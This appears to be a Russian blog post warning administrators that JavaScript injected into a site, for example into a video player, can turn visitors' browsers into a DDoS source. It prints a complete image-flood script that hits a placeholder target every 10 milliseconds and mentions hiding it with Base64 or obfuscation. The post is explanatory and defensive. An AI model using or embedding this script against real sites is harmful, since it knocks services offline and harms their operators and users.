JavaScript или как за'DDos'ить самого себя.
DDos самого себя, это страшный сон любого администратора. По этому что бы сны были гладкими и мягкими следует проверять скрипты которые внедряются в проект на сайте (сервере).
Наибольшее распространение получил известность встраиваясь в JavaScript-код плеера.
С небольшими изменениями скрипт может также атаковать ресурсы сети без вашего ведома просто подгружаясь в код плеера или просто ваш ресурс взломали и используют по своему назначению.
Сам код прост и не замысловат:
function imgflood() {
var TARGET = 'victim-website.com'
var URI = '/index.php?'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
Также код может быть легко попрятан под Base64 или обфусцирован. Оригинал этого кода взят здесь - https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/
Вот так этот код выглядел при внедрении его в объект:
а это результат его работы:
оригинал фото взят здесь
=====
~$ Удачи /не-болейте/-и/не-кашляйте
Комментариев нет:
Отправить комментарий